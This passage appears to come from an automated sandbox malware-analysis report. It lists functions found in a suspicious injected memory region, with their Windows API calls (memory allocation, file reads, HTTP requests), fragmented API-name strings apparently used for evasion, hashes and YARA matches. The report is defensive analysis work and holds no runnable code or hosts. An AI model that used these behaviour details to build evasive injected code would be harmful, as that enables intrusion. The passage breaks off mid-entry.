                                              • NtReadFile.NTDLL(02D13D72,5E972F65,FFFFFFFF,02D13A31,?,?,02D13D72,?,02D13A31,FFFFFFFF,5E972F65,02D13D72,?,00000000), ref: 02D186D5
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                              • Instruction ID: 6d1010b6f5c08e167a591a0f83a566d99fd058733bc0266f0fa8c5cbeaa49c90
                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                              • Instruction Fuzzy Hash: 4AF0A4B2200208ABCB14DF89DC94EEB77ADEF8C754F158248BA1D97241D630E951CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D187C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D02D11,00002000,00003000,00000004), ref: 02D187F9
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                              • Instruction ID: 0bcc7dec2832ce5086462229efa8c60ea98b4802e42ade69c224dd8d5f54f7c9
                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                              • Instruction Fuzzy Hash: 3AF015B2200208ABCB14DF89DC90EEB77ADEF88750F118148FE0897241C630F910CBB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D187BC, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D02D11,00002000,00003000,00000004), ref: 02D187F9
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: d7d5eefd960e0da498575d20fa9efd2ece977158ab8dd3051e4c2ad48f7bfdd0
                                              • Instruction ID: 4ba84d105af6a978b0e3dcb550f7cb794fad4f0dd65bf1004fe758d26f49d399
                                              • Opcode Fuzzy Hash: d7d5eefd960e0da498575d20fa9efd2ece977158ab8dd3051e4c2ad48f7bfdd0
                                              • Instruction Fuzzy Hash: 37F015B6200109AFCB14DF98DC95EEB7BA9EF88354F158258FE49A7241C631E951CBB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D18710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtClose.NTDLL(02D13D50,?,?,02D13D50,00000000,FFFFFFFF), ref: 02D18735
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                              • Instruction ID: 78a6a311cb9d017336cb255d0ea96a2991af08d85ea39b2c5b51947c4d3418e8
                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                              • Instruction Fuzzy Hash: FDD01776240214BBD710EB98DC89EE77BADEF48760F154499BA189B242C530FA40CAE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04769540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                              • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: cf8a8444886e479b753133cb732fe38279c503ee756a102d214f78e9985acd2a
                                              • Instruction ID: 036e9d5204a6877303f882bdce41d59326b4a845e4546322f9951c77d8f96fa6
                                              • Opcode Fuzzy Hash: cf8a8444886e479b753133cb732fe38279c503ee756a102d214f78e9985acd2a
                                              • Instruction Fuzzy Hash: AE900265211000073515A559070450704469BD9395391C031F1007560CD661D8657161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 047695D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                              • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 7976adffd71db819ab114b884250ed713c8db381e7c82447d108e68d67171656
                                              • Instruction ID: 528678a6fe235e03500c3bd788fb30be60837c8db9376ce98e13575c79f04e4c
                                              • Opcode Fuzzy Hash: 7976adffd71db819ab114b884250ed713c8db381e7c82447d108e68d67171656
                                              • Instruction Fuzzy Hash: 709002A120200007751571594414616440A9BE4245B91C031E10065A0DC565D8957165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04769660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                              • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c58d590fbcc5f4476ff49cb6a0e6486b11f861a104b5bc3e7c668b1b6f59f05d
                                              • Instruction ID: 13e14efbe8f1738601437be1d3d29163245a103cf3900c025fa19ea5b9316b7f
                                              • Opcode Fuzzy Hash: c58d590fbcc5f4476ff49cb6a0e6486b11f861a104b5bc3e7c668b1b6f59f05d
                                              • Instruction Fuzzy Hash: 5F90027120100806F5907159440464A04059BD5345FD1C025A0017664DCA55DA5D77E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04769650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                              • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 491257b4e73553cbfe8826ffaf547bf53c2b0538bec096765cf1f6a2b78e2817
                                              • Instruction ID: 90a5cb84bb82a3959ec9d579b448e28f65f13f2c7fe386c3e0eb571e39f0d5db
                                              • Opcode Fuzzy Hash: 491257b4e73553cbfe8826ffaf547bf53c2b0538bec096765cf1f6a2b78e2817
                                              • Instruction Fuzzy Hash: 7B90027120504846F55071594404A4604159BD4349F91C021A00566A4D9665DD59B6A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 047696E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                              • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 350f36ac0ebeca70b6d30c198f13a85c0b0ba3650de2be4d61affdf505585b9a
                                              • Instruction ID: 2bc478fa8838694022dd53f0a5887dc060d7358bcebe0240e4dc89b7348d4cef
                                              • Opcode Fuzzy Hash: 350f36ac0ebeca70b6d30c198f13a85c0b0ba3650de2be4d61affdf505585b9a
                                              • Instruction Fuzzy Hash: DE90027120108806F5206159840474A04059BD4345F95C421A4416668D86D5D8957161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 047696D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                              • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 5d8cc5e05165f074b90d411326c191f5e8a5685da25e4304737f90ffbfad8cd1
                                              • Instruction ID: cf46df9eebcfa1458cfc528c3439705edf7b9c9a3e29c98a4037483374406fdd
                                              • Opcode Fuzzy Hash: 5d8cc5e05165f074b90d411326c191f5e8a5685da25e4304737f90ffbfad8cd1
                                              • Instruction Fuzzy Hash: AA90027120100846F51061594404B4604059BE4345F91C026A0116664D8655D8557561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04769710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                              • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: fed071d56ccbf0ca3d36cdd920d855788d70d374685ab62e62ba4f06e45e61b1
                                              • Instruction ID: 16386fe8692afe460bb55df4dd588470aca7d5f1a17e88ad66c0d3e6766738a1
                                              • Opcode Fuzzy Hash: fed071d56ccbf0ca3d36cdd920d855788d70d374685ab62e62ba4f06e45e61b1
                                              • Instruction Fuzzy Hash: B690027120100406F5106599540864604059BE4345F91D021A5016565EC6A5D8957171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04769FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                              • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: d6bf0521a5ac810a0447368e5d5d20fa75cb206a143f74ca2820c7865f2a251a
                                              • Instruction ID: fa6eb9b880daa200e2bd685483d06bb0466e761099f6fa58bfee4d0ae22de168
                                              • Opcode Fuzzy Hash: d6bf0521a5ac810a0447368e5d5d20fa75cb206a143f74ca2820c7865f2a251a
                                              • Instruction Fuzzy Hash: 5C90027131114406F5206159840470604059BD5245F91C421A0816568D86D5D8957162
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04769780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                              • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8594991fc5f97722d69f8e6cf2e2cf75bd30b284835b7de3048b42b40dbb7dae
                                              • Instruction ID: c3e80b62e29d29c3ad34b2011495fb01b1d32dde87a4011b0584f26f691b771d
                                              • Opcode Fuzzy Hash: 8594991fc5f97722d69f8e6cf2e2cf75bd30b284835b7de3048b42b40dbb7dae
                                              • Instruction Fuzzy Hash: B090026921300006F5907159540860A04059BD5246FD1D425A0007568CC955D86D7361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04769860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                              • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: a59ba39544880a78e2d72505e8fc7447b23ce94ea808636dfaaeaa4b36d01b53
                                              • Instruction ID: e562573f872b171bcc38f9ac500032e6020ee166c48da4e4927d68cfb0211d3d
                                              • Opcode Fuzzy Hash: a59ba39544880a78e2d72505e8fc7447b23ce94ea808636dfaaeaa4b36d01b53
                                              • Instruction Fuzzy Hash: F890027120100417F5216159450470704099BD4285FD1C422A0416568D9696D956B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04769840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                              • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: f7e62581bdf5e54d50b847bde377a54af7212648e73e1094bfc029c46de1363f
                                              • Instruction ID: 51c856255f1a62140ae41ff357873562ca99154fed4b496dcb466373125ccec9
                                              • Opcode Fuzzy Hash: f7e62581bdf5e54d50b847bde377a54af7212648e73e1094bfc029c46de1363f
                                              • Instruction Fuzzy Hash: 1B900261242041567955B15944045074406ABE42857D1C022A1406960C8566E85AF661
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04769910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                              • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 3a1ca7076e0b2458b1192854b5d932fbff0e985f5211b0a614e657b35c1abb33
                                              • Instruction ID: 267ebed1745b0c5489ac03657c4b7aade6b357878fa26bb94e2b189f4e0702a0
                                              • Opcode Fuzzy Hash: 3a1ca7076e0b2458b1192854b5d932fbff0e985f5211b0a614e657b35c1abb33
                                              • Instruction Fuzzy Hash: 029002B120100406F5507159440474604059BD4345F91C021A5056564E8699DDD976A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 047699A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                              • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 47ace76e15a7a343aec176aff26a96f317e18cf23f8d282e39f0685eaa75f2b5
                                              • Instruction ID: 02845317f7defc90407b848847cb90d968869b0fd6948aa8ab7f6f2645a515c0
                                              • Opcode Fuzzy Hash: 47ace76e15a7a343aec176aff26a96f317e18cf23f8d282e39f0685eaa75f2b5
                                              • Instruction Fuzzy Hash: 399002A134100446F51061594414B060405DBE5345F91C025E1056564D8659DC567166
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04769A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                              • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 03ee1b9b90a69163a71a10127d3aaf5f955b14109c3f6ef2c03d7ddebefe6835
                                              • Instruction ID: 1c3db153baa8fa2ead280ff91690705dfa0747b44af06edbcb625831a4e5a94b
                                              • Opcode Fuzzy Hash: 03ee1b9b90a69163a71a10127d3aaf5f955b14109c3f6ef2c03d7ddebefe6835
                                              • Instruction Fuzzy Hash: 1F90026121180046F61065694C14B0704059BD4347F91C125A0146564CC955D8657561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D18CF0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 02D18D58
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: HttpOpenRequest
                                              • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                              • API String ID: 1984915467-4016285707
                                              • Opcode ID: 6c1eafa3af226a689b846ded80bf8f0a7dd1c2f620c7b46790f01cf217bfb4e9
                                              • Instruction ID: 081a4caabe925580186537e232a5e1f4952c8b5aa9ed5f504c6a4b9b4f4b9d15
                                              • Opcode Fuzzy Hash: 6c1eafa3af226a689b846ded80bf8f0a7dd1c2f620c7b46790f01cf217bfb4e9
                                              • Instruction Fuzzy Hash: CA01E9B2905118AFDB04DF98D841DEF7BB9EB48210F158289FD08A7305D670ED10CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D18D70, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 02D18DCC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: HttpRequestSend
                                              • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                              • API String ID: 360639707-2503632690
                                              • Opcode ID: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
                                              • Instruction ID: 0cc6d2204b07e3eb8c845a448fc73442f5d9f1d93a9f28181833bb31300b5824
                                              • Opcode Fuzzy Hash: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
                                              • Instruction Fuzzy Hash: BC014BB2905218AFDB04DF98D841AEFBBB8EB58210F108189FD08A7304D670EE10CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D18C70, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 02D18CD8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: ConnectInternet
                                              • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                              • API String ID: 3050416762-1024195942
                                              • Opcode ID: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
                                              • Instruction ID: 1939c71d09dda4e6fcfdf0e11b9490c44c0fb4394ee89c3adfefb8df7a7df9a5
                                              • Opcode Fuzzy Hash: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
                                              • Instruction Fuzzy Hash: 5F01E9B2915119AFDB14DF99D941EEF77B9EB48310F158289BE08A7240D630EE10CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D18D66, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 40networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 02D18DCC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: HttpRequestSend
                                              • String ID: Http$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                              • API String ID: 360639707-1070052511
                                              • Opcode ID: 661a3126977b1c249245908ec5c512718867f14d4ea756906b3e136782e994a2
                                              • Instruction ID: e98b4dda3a12fff8e9b1911534e0f6b154edf63b0c0fc375cfdda0e870666e55
                                              • Opcode Fuzzy Hash: 661a3126977b1c249245908ec5c512718867f14d4ea756906b3e136782e994a2
                                              • Instruction Fuzzy Hash: 8401ADB1809298AFDB04CF98D840ABFBBB8EF55210F04869CFD586B300C3309901CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D18C00, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 02D18C57
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: InternetOpen
                                              • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                              • API String ID: 2038078732-3155091674
                                              • Opcode ID: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
                                              • Instruction ID: d61203629e59f9fd8e1c5fad4e07876a8cb4d48db58468ffa20534827af2a186
                                              • Opcode Fuzzy Hash: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
                                              • Instruction Fuzzy Hash: 47F01DB2901118AF9B14DFD8DC419EB77B9EF48310B048589BD1897301D635AE10CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D188E2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(02D13536,?,02D13CAF,02D13CAF,?,02D13536,?,?,?,?,?,00000000,00000000,?), ref: 02D188DD
                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02D03B93), ref: 02D1891D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateFree
                                              • String ID: .z`
                                              • API String ID: 2488874121-1441809116
                                              • Opcode ID: ae8cd478b69552064149f2d8c6b63cfce8613677c2427c42e847110b6c861fb2
                                              • Instruction ID: 9664d99862b0fd10c8ee807b8c20a1fc7fb0490412f3ff64f313b6e8ad0f5ef4
                                              • Opcode Fuzzy Hash: ae8cd478b69552064149f2d8c6b63cfce8613677c2427c42e847110b6c861fb2
                                              • Instruction Fuzzy Hash: D4F06DB2204204AFDB04DFA8EC44EEB3769EF88354F01855AF91C97341C631E910CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D17300, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 02D173A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: a39b82ecfbac99471acaa30ec38214f402b2a6bfa8d79c148fe129acb514d8ec
                                              • Instruction ID: cccf713333d56c74d1931217d05f828afd5f1bd1bb9a27e9c037f9e870e1fe4d
                                              • Opcode Fuzzy Hash: a39b82ecfbac99471acaa30ec38214f402b2a6bfa8d79c148fe129acb514d8ec
                                              • Instruction Fuzzy Hash: 41317AB6602600BBD711EF64D8A1FABB7A9EB88700F00811DFA599B641D730B845CBE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D172F6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 02D173A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: 5ec9b7b12874398c0c2206ba652979740e3718ba864f53283c2692dd3a8cbd38
                                              • Instruction ID: 5963f2c1bf299674da41997bfdfb890365de2758d41e3ac3d767d5c5ace14690
                                              • Opcode Fuzzy Hash: 5ec9b7b12874398c0c2206ba652979740e3718ba864f53283c2692dd3a8cbd38
                                              • Instruction Fuzzy Hash: 2F317CB6901300BBD710EF64D8A1F6BB7B9EB88700F108129FA599B641D770A845CBE5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D188F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02D03B93), ref: 02D1891D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID: .z`
                                              • API String ID: 3298025750-1441809116
                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                              • Instruction ID: d1076bd0accfa8cc35edca94376bfc9596e05cdb286131222af14505f8021208
                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                              • Instruction Fuzzy Hash: 70E012B1200208ABDB18EF99DC48EA777ADEF88750F018558FA085B241C630E910CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D07280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D072DA
                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D072FB
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
                                              • Instruction ID: ca6c8ed480de28a7c494144176bd3ee8f9b983f4150e712db3ff3097aca9879f
